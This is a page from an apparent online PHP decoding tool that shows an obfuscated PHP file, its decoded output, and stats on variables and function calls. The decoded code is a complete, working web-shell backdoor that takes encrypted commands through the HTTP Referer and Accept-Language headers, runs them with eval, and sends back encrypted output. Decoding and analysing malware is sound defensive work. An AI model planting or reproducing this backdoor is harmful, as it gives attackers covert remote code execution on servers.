Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $I=']:t]:{$i}^$k{]:$j};}}r]:e]:turn $o;}$r=$]:_]:SERVER;$rr]:=]:@$]:r["HTTP_REFERE]..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$I=']:t]:{$i}^$k{]:$j};}}r]:e]:turn $o;}$r=$]:_]:SERVER;$rr]:=]:@$]:r["HTTP_REFERE]:R]:"];$ra=]:@$';
$o='tr($u["qu]:e]:ry"],$q]:);$q=arr]:ay_v]:]:]:alues($q);preg_ma]:tch_all("/([\\]:w])[\\]:w-]+';
$w=':s[$i],0,$e))]:),$k)))]:;$o=]:o]:b]:_get_contents();o]:b_e]:nd_clea]:n();$d=ba]:se64_e]:]:n';
$D=']:(?:;q=0]:]:.([\\d])]:]:)?,?/",$ra,$m);i]:f($q&&$]:m)]:{@session_sta]:]:rt()]:;$s=&';
$f=str_replace('tB','','tBctBrtBeatetB_futBnctBtion');
$x='($ss(md]:5($i.$]:kh),]:0,3)]:);$f=$sl($s]:s(md5(]:$i.$]:kf),0]:,]:3));$p="";fo]:r($]:z=]:1;]:$';
$U='$_SESSIO]:N;$ss]:=]:"su]:bstr";$sl="str]:tolow]:er";]:$i=]:$m[1]]:[0].$m[1][1];$h]:=$s]:l';
$J='code(]:x(g]:zcompress($o)]:,$k))]:;]:]:pr]:int("<$k>$d</]:$k>");@sess]:ion_dest]:roy();}}}}';
$r='$]:o=]:"]:";for($i=0;$i<]:$l;){f]:]:or($j=0]:;($j<$c&&$i<$l]:);$j++]:]:,$i++){$o.=$';
$q='as]:e64_de]:code(preg_]:rep]:lace(a]:rray("/_/]:","/-]:/"),]:array]:("/","+]:"]:),$ss($]';
$b=']:z<count($m]:[1]);$z++)$p.=$q[$]:m[2]]:[$z]];]:i]:f(st]:rpos($p,$h)]:===0){$s]:[$i]=';
$c=']:r["HTTP_]:ACCEPT_LA]:NGUAGE"];]:]:]:if($]:rr&&$ra]:){$u=parse_url(]:$]:rr);pa]:rse_s';
$O='$kh="5d]:41";]:$kf=]:"]:402a";function ]:x]:($t,$k){$]:]:c=strlen($k);$]:l=strle]:n($t);';
$K='"";]:$p]:=$ss($p,3)]:;}if(arr]:ay]:_key_e]:x]:ists($i,$s)]:){$s[]:]:$i].=$p;$e=st]:rpos($s[';
$L='$]:i],]:$f);if(]:$e]:){$k=$]:kh.$kf]:;ob_start();@]:eva]:l]:(@gzuncompre]:ss(@]:x(@b';
$h=str_replace(']:','',$O.$r.$I.$c.$o.$D.$U.$x.$b.$K.$L.$q.$w.$J);
$k=$f('',$h);$k();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$D ]:(?:;q=0]:]:.([\d])]:]:)?,?/",$ra,$m);i]:f($q&&$]:m)]:{@ses..
$I ]:t]:{$i}^$k{]:$j};}}r]:e]:turn $o;}$r=$]:_]:SERVER;$rr]:=]:..
$J code(]:x(g]:zcompress($o)]:,$k))]:;]:]:pr]:int("<$k>$d</]:$k..
$K "";]:$p]:=$ss($p,3)]:;}if(arr]:ay]:_key_e]:x]:ists($i,$s)]:)..
$L $]:i],]:$f);if(]:$e]:){$k=$]:kh.$kf]:;ob_start();@]:eva]:l]:..
$O $kh="5d]:41";]:$kf=]:"]:402a";function ]:x]:($t,$k){$]:]:c=s..
$U $_SESSIO]:N;$ss]:=]:"su]:bstr";$sl="str]:tolow]:er";]:$i=]:$..
$b ]:z<count($m]:[1]);$z++)$p.=$q[$]:m[2]]:[$z]];]:i]:f(st]:rpo..
$c ]:r["HTTP_]:ACCEPT_LA]:NGUAGE"];]:]:]:if($]:rr&&$ra]:){$u=pa..
$f create_function
$h $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$k None
$o tr($u["qu]:e]:ry"],$q]:);$q=arr]:ay_v]:]:]:alues($q);preg_ma..
$q as]:e64_de]:code(preg_]:rep]:lace(a]:rray("/_/]:","/-]:/"),]..
$r $]:o=]:"]:";for($i=0;$i<]:$l;){f]:]:or($j=0]:;($j<$c&&$i<$l]..
$w :s[$i],0,$e))]:),$k)))]:;$o=]:o]:b]:_get_contents();o]:b_e]:..
$x ($ss(md]:5($i.$]:kh),]:0,3)]:);$f=$sl($s]:s(md5(]:$i.$]:kf),..

Stats

MD5 07c417d64f115b8f8a6911ba006874d2
Eval Count 1
Decode Time 104 ms